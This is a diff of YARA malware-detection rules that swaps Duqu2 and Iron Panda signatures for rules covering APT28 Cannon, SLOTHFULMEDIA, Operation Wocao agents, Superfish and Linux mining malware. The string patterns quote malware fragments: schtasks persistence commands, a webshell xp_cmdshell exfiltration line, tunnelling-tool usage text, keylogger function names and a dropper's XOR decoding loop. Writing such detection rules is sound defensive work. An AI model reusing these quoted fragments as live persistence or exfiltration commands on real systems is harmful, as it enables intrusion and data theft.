-		hash2 = "8e97c371633d285cd8fc842f4582705052a9409149ee67d97de545030787a192"
-		hash3 = "2796a119171328e91648a73d95eb297edc220e8768f4bbba5fb7237122a988fc"
-		hash4 = "5559fcc93eef38a1c22db66a3e0f9e9f026c99e741cc8b1a4980d166f2696188"
+		note = "This rule only works on VT or systems that perform macro subfile extraction"
+		hash1 = "0878eec9ecae493659e42c1d87588573c1e6fc30acf7a59e6fdb5296b1c198ef"
+		hash2 = "a0963ac15339c9803b4355fd71b68bf6ddedad960d5b3ad40bae873263470191"
+		hash3 = "dd094e44a817604596d1ab06ca6e9597d49ca0a2cbe9239c73ceaad70265ec2a"
+		hash4 = "7b9094ea41e89379c7048ef784ef494c4597ea0d31b707dcb9c8495f241f5fb0"
+		hash5 = "35d8242726b905882bbfcf2770f84cb6f40552e76bff8fb0082ca10de3d61e54"
+		hash6 = "bf9ff20d814bf21d46a22abbd7a8ad0276145807f9adf8d2787df9e3fce3f35d"
+		hash7 = "77966004fcbff147f6923b3405ad9ad4e1dda42d0931564d0cdc4c7e1c91106a"
+		hash8 = "c77c8033a1e5f694fa119dd7f78811f6015726822121b9414fc01e7de8770447"
 
 	strings:
-		$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide
-		$s2 = "MSI.dll" fullword ascii
+		$com1a = "00A0C91F3880"
+		$com1b = "C08AFD90"
+		$com2a = "00A0C90A8F39"
+		$com2b = "9BA05972"
+		$s3 = "ShellExecute" fullword
+		$s4 = "GetObject" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and $x1 ) or ( all of them )
+		filesize < 1MB and ( uint32be( 0 ) == 0x41747472 or uint32be( 0 ) == 0x61747472 or uint32be( 0 ) == 0x41545452 ) and all of ( $s* ) and ( all of ( $com1* ) or all of ( $com2* ) )
 }
-rule SIGNATURE_BASE_Duqu2_Sample2 : FILE
+rule SIGNATURE_BASE_APT_LNX_Academic_Camp_May20_Eraser_1 : FILE
 {
 	meta:
-		description = "Detects Duqu2 Malware"
+		description = "Detects malware used in attack on academic data centers"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a32f54a3-8656-5592-ac40-17330bfca319"
-		date = "2016-07-02"
+		id = "36d17887-9844-5fa4-8a0d-89cc41b2d876"
+		date = "2020-05-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L30-L50"
+		reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_academic_data_centers_camp_may20.yar#L1-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6afd87d472929f56272eb6f28970f2c8be5eb08e6126287391aee1269de1100d"
-		score = 80
+		logic_hash = "9a0410e86fa8fb8b599e5b8a6508d6889eb6e26600f0ecf222561ac4a169676d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d12cd9490fd75e192ea053a05e869ed2f3f9748bf1563e6e496e7153fb4e6c98"
-		hash2 = "5ba187106567e8d036edd5ddb6763f89774c158d2a571e15d76572d8604c22a0"
-		hash3 = "6e09e1a4f56ea736ff21ad5e188845615b57e1a5168f4bdaebe7ddc634912de9"
-		hash4 = "c16410c49dc40a371be22773f420b7dd3cfd4d8205cf39909ad9a6f26f55718e"
-		hash5 = "2ecb26021d21fcef3d8bba63de0c888499110a2b78e4caa6fa07a2b27d87f71b"
-		hash6 = "2c9c3ddd4d93e687eb095444cef7668b21636b364bff55de953bdd1df40071da"
+		hash1 = "552245645cc49087dfbc827d069fa678626b946f4b71cb35fa4a49becd971363"
 
 	strings:
-		$s1 = "=<=Q=W=a=g=p=v=|=" fullword ascii
-		$s2 = ">#>(>.>3>=>]>d>p>" fullword ascii
+		$sc2 = { E6 FF FF 48 89 45 D0 8B 45 E0 BA 00 00 00 00 BE
+               00 00 00 00 89 C7 E8 }
+		$sc3 = { E6 FF FF 89 45 DC 8B 45 DC 83 C0 01 48 98 BE 01
+               00 00 00 48 89 C7 E8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of ( $s* )
+		uint16( 0 ) == 0x457f and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_Duqu2_Sample3 : FILE
+rule SIGNATURE_BASE_APT_LNX_Academic_Camp_May20_Loader_1 : FILE
 {
 	meta:
-		description = "Detects Duqu2 Malware"
+		description = "Detects malware used in attack on academic data centers"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c558445f-fbe3-57db-80f7-09a87b097921"
-		date = "2016-07-02"
+		id = "cda65abd-d918-5ee6-8f4a-554d47532d76"
+		date = "2020-05-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L52-L66"
+		reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_academic_data_centers_camp_may20.yar#L20-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4adaf71a4acd8ce122af0b6f1267dc34c5190efcb4a6fa3322c1e6cf67a546a5"
-		score = 80
+		logic_hash = "a73883f9fdf3d53694d9f9efec5f8f15994c5fd80c5f2a87b1741db6b954a023"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69"
+		hash1 = "0efdd382872f0ff0866e5f68f0c66c01fcf4f9836a78ddaa5bbb349f20353897"
 
 	strings:
-		$s1 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide
+		$sc1 = { C6 45 F1 00 C6 45 F2 0A C6 45 F3 0A C6 45 F4 4A
+               C6 45 F5 04 C6 45 F6 06 C6 45 F7 1B C6 45 F8 01 }
+		$sc2 = { 01 48 39 EB 75 EA 48 83 C4 08 5B 5D 41 5C 41 5D }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and $s1 )
+		uint16( 0 ) == 0x457f and filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Duqu2_Sample4 : FILE
+rule SIGNATURE_BASE_Visualdiscovery_Lonovo_Superfish_SSL_Hijack : FILE
 {
 	meta:
-		description = "Detects Duqu2 Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8c5ca68d-762c-5d2e-8d37-f58dc66bcae2"
-		date = "2016-07-02"
+		description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
+		author = "Florian Roth (Nextron Systems) / improved by kbandla"
+		id = "200c016e-7ad8-5b58-be5f-7866e91d60e9"
+		date = "2015-02-19"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L68-L85"
+		reference = "https://twitter.com/4nc4p/status/568325493558272000"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/threat_lenovo_superfish.yar#L4-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ddecd1d7fa007b83fe6e29ac8983d02511a89a16ab2365f8086ec92a52d4bf33"
-		score = 80
+		logic_hash = "0f156a51dccafe32467b64251507928b1c7a1b04595063aa66aa69da6c4cc4fc"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3536df7379660d931256b3cf49be810c0d931c3957c464d75e4cba78ba3b92e3"
+		hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
+		hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
+		hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
+		hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
 
 	strings:
-		$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide
-		$s2 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide
-		$s3 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide
-		$s4 = "ProcessUserAccounts" fullword ascii
+		$s2 = "Invalid key length used to initialize BlowFish." fullword ascii
+		$s3 = "GetPCProxyHandler" fullword ascii
+		$s4 = "StartPCProxy" fullword ascii
+		$s5 = "SetPCProxyHandler" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of ( $x* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2MB and all of ( $s* )
 }
-rule SIGNATURE_BASE_Duqu2_Uas : FILE
+rule SIGNATURE_BASE_APT_APT28_Cannon_Trojan_Nov18_1 : FILE
 {
 	meta:
-		description = "Detects Duqu2 Executable based on the specific UAs in the file"
+		description = "Detects Cannon Trojan used by Sofacy"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d82f6351-fab0-5324-850f-dd40a172fceb"
-		date = "2016-07-02"
+		id = "a60f3e75-8bfe-592e-90d1-321bd86173ac"
+		date = "2018-11-20"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu2.yar#L86-L104"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_cannon.yar#L2-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8bf27ca851c580080514dfa886c0d7c69ac114efb5dbc35ccd1e7686c3dd44b1"
-		score = 80
+		logic_hash = "de8c7bf80fe6209d00955c375b769a3aca138759335abb11f5086f85a4a9c367"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "52fe506928b0262f10de31e783af8540b6a0b232b15749d647847488acd0e17a"
-		hash2 = "81cdbe905392155a1ba8b687a02e65d611b60aac938e470a76ef518e8cffd74d"
+		hash1 = "61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e"
 
 	strings:
-		$x1 = "Mozilla/5.0 (Windows NT 6.1; U; ru; rv:5.0.1.6) Gecko/20110501 Firefox/5.0.1 Firefox/5.0.1" fullword wide
-		$x2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7xs5D9rRDFpg2g" fullword wide
-		$x3 = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322)" fullword wide
-		$x4 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2" fullword wide
+		$xc1 = { 46 6F 72 6D 31 00 63 61 6E 6E 6F 6E 00 4D 44 61
+               74 00 41 55 54 48 }
+		$xc2 = { 13 4F 00 53 00 3A 00 20 00 20 00 7B 00 30 00 7D
+               00 0A 00 00 17 53 00 44 00 69 00 72 00 3A 00 20
+               00 20 00 7B 00 30 00 7D 00 0A 00 00 1B 44 00 6F
+               00 6D 00 61 00 69 00 6E 00 3A 00 20 00 20 00 7B
+               00 30 00 7D 00 0A 00 00 15 48 00 6F 00 73 00 74
+               00 3A 00 20 00 7B 00 30 00 7D 00 0A 00 00 21 43
+               00 75 00 72 00 72 00 65 00 6E 00 74 00 55 00 73
+               00 72 00 3A 00 20 00 7B 00 30 00 7D 00 0A 00 00
+               17 54 00 69 00 6D 00 65 00 5A 00 3A 00 20 00 7B
+               00 30 00 7D }
+		$x2 = "\\Desktop\\cannon\\obj\\" ascii
+		$x3 = "C:\\Users\\Public\\Music\\s.txt" fullword wide
+		$s1 = "C:\\Documents and Settings\\All Users\\Documents" fullword wide
+		$s2 = "notEncoded - Value here is never used" fullword wide
+		$s3 = "Windows NT\\CurrentVersion\\Winlogon\"" fullword wide
+		$s4 = "AnswerMessageTraverser`1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_Ironpanda_Dnstunclient : FILE
+rule SIGNATURE_BASE_APT_MAL_SLOTHFULMEDIA_Oct20_1 : FILE
 {
 	meta:
-		description = "Iron Panda malware DnsTunClient - file named.exe"
+		description = "Detects SLOTHFULMEDIA malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd608176-d7e7-5819-a7d4-e8b89d4a59c2"
-		date = "2015-09-16"
+		id = "cc413225-f084-5859-bc27-04eb018d8894"
+		date = "2020-10-01"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L10-L36"
+		reference = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_iamtheking.yar#L2-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431"
-		logic_hash = "07c142f6eb11ecc8ed5f55d6b0cc7110c6268e189f3ce29215f75b7aba91a290"
-		score = 80
+		logic_hash = "e50bda40eb05767e0903c3d8dd62b4e0290d89740c82c8b7f391d5763dc35156"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273"
+		hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae"
+		hash3 = "f0503f0131040b805e106eafe64a65d9404a0e279f052237b868e456c34d36e6"
+		hash4 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5"
+		hash5 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb"
+		hash6 = "cb2adcaaa25bb6b8a9f1c685c219f8d6d78aa5cfd65c633f4d255ff81da2c517"
 
 	strings:
-		$s1 = "dnstunclient -d or -domain <domain>" fullword ascii
-		$s2 = "dnstunclient -ip <server ip address>" fullword ascii
-		$s3 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr " fullword ascii
-		$s4 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr " fullword ascii
-		$s5 = "taskkill /im conime.exe" fullword ascii
-		$s6 = "\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cpp" ascii
-		$s7 = "UDP error:can not bing the port(if there is unclosed the bind process?)" fullword ascii
-		$s8 = "use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)" fullword ascii
-		$s9 = "error: packet num error.the connection have condurt,pls try later" fullword ascii
-		$s10 = "Coversation produce one error:%s,coversation fail" fullword ascii
-		$s11 = "try to add many same pipe to select group(or mark is too easy)." fullword ascii
+		$xc1 = { 25 73 26 69 3D 25 64 00 48 54 54 50 2F 31 2E 31
+               00 00 00 00 50 4F 53 54 00 00 00 00 43 6F 6E 74
+               65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 00 00
+               5C 00 53 00 65 00 74 00 75 00 70 00 55 00 69 00
+               00 00 00 00 25 00 73 00 25 00 73 00 5F 00 25 00
+               64 00 2E 00 64 00 61 00 74 }
+		$xc2 = { 2F 76 3F 6D 3D 00 00 00 35 30 31 00 32 30 30 00
+               2A 00 2E 00 2A 00 00 00 25 00 73 00 00 00 00 00
+               53 00 65 00 44 00 65 00 62 00 75 00 67 00 50 00
+               72 00 69 00 76 00 69 00 6C 00 65 00 67 00 65 }
+		$xc3 = { 00 25 00 73 00 7C 00 25 00 73 00 7C 00 25 00 73
+               00 7C 00 25 00 73 00 00 00 5C 00 46 00 69 00 6C
+               00 74 00 65 00 72 00 33 00 2E 00 6A 00 70 00 67 }
+		$sc1 = { 25 74 65 6D 70 25 00 00 25 73 5C 25 73 2E 65 78
+               65 00 00 00 25 74 65 6D 70 25 00 00 25 73 5C 25
+               73 2E 65 78 65 }
+		$sc2 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65
+               74 2D 73 74 72 65 61 6D 2C 61 70 70 6C 69 63 61
+               74 69 6F 6E 2F 78 68 74 6D 6C 00 00 25 73 26 69
+               3D 25 64 00 48 54 54 50 2F 31 2E 31 00 00 00 00
+               50 4F 53 54 }
+		$s1 = "%s%s_%d.dat" wide fullword
+		$s2 = "Local Security Process" wide fullword
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" ascii fullword
+		$s4 = "Global%s%d" wide fullword
+		$s5 = "ExtKeyloggerStart" ascii fullword
+		$s6 = "GetExtendedTcpTable" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them ) or 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_Ironpanda_Malware1 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Csharp
 {
 	meta:
-		description = "Iron Panda Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "14dc2611-4ca9-5dd2-ad00-9397a18d7be2"
-		date = "2015-09-16"
+		description = "Strings from CSharp version of Agent"
+		author = "Fox-IT SRT"
+		id = "e5212226-a82d-558d-abb4-43ad7848764e"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L38-L55"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a"
-		logic_hash = "4b50a2c7f0f94b678fc560eefb217c067e934f8e7d64bc0f0d16afcccccd0d08"
+		logic_hash = "e77fcd2ac0c21db54563b15466962a775a5e8ef73cedb3af5cd00d5b0d615e4c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$x1 = "activedsimp.dll" fullword wide
-		$s1 = "get_BadLoginAddress" fullword ascii
-		$s2 = "get_LastFailedLogin" fullword ascii
-		$s3 = "ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED" fullword ascii
-		$s4 = "get_PasswordExpirationDate" fullword ascii
+		$a = "mysend(client_sock, new byte[] { 0x16, 0x00 }, 2);" ascii wide
+		$b = "Dns.GetHostAddresses(sip.Remove(sip.Length - 1));" ascii wide
+		$c = "Port = 256 * buf[4] + buf[5];" ascii wide
+		$d = "Port = 256 * buf[AddrLen] + buf[AddrLen + 1];" ascii wide
+		$e = "StartTransData(CliSock" ascii wide
+		$f = "static void ForwardTransmit(object ft_data)" ascii wide
+		$key = "0x4c, 0x1b, 0x68, 0x0b, 0x6a, 0x18, 0x09, 0x41, 0x5a, 0x36, 0x1f, 0x56, 0x26, 0x2a, 0x03, 0x44, 0x7d, 0x5f, 0x03, 0x7b, 0x07, 0x6e, 0x03, 0x77, 0x30, 0x70, 0x52, 0x42, 0x53, 0x67, 0x0a, 0x2a" ascii wide
+		$key_raw = { 4c1b680b6a1809415a361f56262a03447d5f037b076e03773070524253670a2a }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Ironpanda_Webshell_JSP : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Powershell_Dropper
 {
 	meta:
-		description = "Iron Panda Malware JSP"
-		author = "Florian Roth (Nextron Systems)"
-		id = "38125418-7867-5073-a731-4f1d64e07588"
-		date = "2015-09-16"
+		description = "Strings from PowerShell dropper of CSharp version of Agent"
+		author = "Fox-IT SRT"
+		id = "833ce607-56a9-5580-bbd1-e72392945fec"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L57-L72"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L24-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3be95477e1d9f3877b4355cff3fbcdd3589bb7f6349fd4ba6451e1e9d32b7fa6"
-		logic_hash = "747ce812b156bf03f8d14ef84e7d2e8535c7c70590dfcb50ce3e957bec745efc"
+		logic_hash = "19f56e69685ae8c13b9dd884f8322915835c16e2c6313f01f9fa447218419108"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "Bin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SaveP" ascii
-		$s2 = "tc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";" fullword ascii
-		$s3 = "Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");" fullword ascii
+		$a = "function format([string]$source)"
+		$b = "foreach($c in $bb){$tt = $tt + [char]($c -bxor"
+		$c = "[agent]::Main($args);"
 
 	condition:
-		filesize < 330KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Ironpanda_Malware_Htran : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Powershell_B64Encoded
 {
 	meta:
-		description = "Iron Panda Malware Htran"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7215f0da-9367-59b4-a78b-aeeebc4f2b69"
-		date = "2015-09-16"
+		description = "Piece of Base64 encoded data from Agent CSharp version"
+		author = "Fox-IT SRT"
+		id = "14e1702d-6229-5989-8bb7-cc9c0c321676"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L74-L102"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L40-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7"
-		logic_hash = "e7312a2d0ffc247eda20cb5453538a501bde6683bf34e7f4bf2230243474ba76"
+		logic_hash = "bcf9a75dbbf90044db76c56ffd07971d4252b0e75d73abf402ca4fadbfb59767"
 		score = 75
-		quality = 60
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
-		$s2 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
-		$s3 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s4 = "[-] ERROR: Must supply logfile name." fullword ascii
-		$s5 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s6 = "[+] Make a Connection to %s:%d...." fullword ascii
-		$s7 = "[+] Waiting another Client on port:%d...." fullword ascii
-		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii
-		$s9 = "[+] Make a Connection to %s:%d ......" fullword ascii
-		$s10 = "cmshared_get_ptr_from_atom" fullword ascii
-		$s11 = "_cmshared_get_ptr_from_atom" ascii
-		$s12 = "[+] OK! I Closed The Two Socket." fullword ascii
-		$s13 = "[-] TransmitPort invalid." fullword ascii
-		$s14 = "[+] Waiting for Client on port:%d ......" fullword ascii
+		$header = "LFNVT0hBBnVfVVJDSx0sU1VPSEEGdV9VUkNLCG9pHSxTVU9IQQZ1X1VSQ0sIZUlK"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 125KB and 3 of them ) or 5 of them
+		all of them
 }
-rule SIGNATURE_BASE_Ironpanda_Malware2 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Py
 {
 	meta:
-		description = "Iron Panda Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "63916f73-808d-5dc7-86f3-05c8b9c5650d"
-		date = "2015-09-16"
+		description = "Strings from Python version of Agent"
+		author = "Fox-IT SRT"
+		id = "ca30dd6a-b596-54ab-b4f0-50e6b1382f73"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L104-L121"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L54-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91"
-		logic_hash = "060c681e7127349464cd98f99cef6e184fbd18d2ec415dc6c95d8ac329e6fe7e"
+		logic_hash = "9b6eba750c96501aae1d86eef458d3e80de665efc7ce9d5aff842bc44363bad2"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "\\setup.exe" ascii
-		$s1 = "msi.dll.urlUT" fullword ascii
-		$s2 = "msi.dllUT" fullword ascii
-		$s3 = "setup.exeUT" fullword ascii
-		$s4 = "/c del /q %s" fullword ascii
+		$a = "vpshex.decode"
+		$b = "self._newsock.recv"
+		$c = "Rsock.connect"
+		$d = /MAX_DATALEN\s?=\s?10240/
+		$e = /LISTEN_MAXCOUNT\s?=\s?80/
+		$f = "ListenSock.listen(LISTEN_MAXCOUNT)"
+		$g = "nextsock.send(head)"
+		$h = "elif transnode"
+		$i = "infobuf[4:6]"
+		$key = "L\\x1bh\\x0bj\\x18\\tAZ6\\x1fV&*\\x03D}_\\x03{\\x07n\\x03w0pRBSg\\n*"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Ironpanda_Malware3 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Py_B64Encoded
 {
 	meta:
-		description = "Iron Panda Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bc3094ab-9dc8-5b9d-aa13-28daa7d5c13f"
-		date = "2015-09-16"
+		description = "Piece of Base64 encoded data from Agent Python version"
+		author = "Fox-IT SRT"
+		id = "eb2701e9-4358-5d24-bfcd-b4dde24f13bf"
+		date = "2019-12-20"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
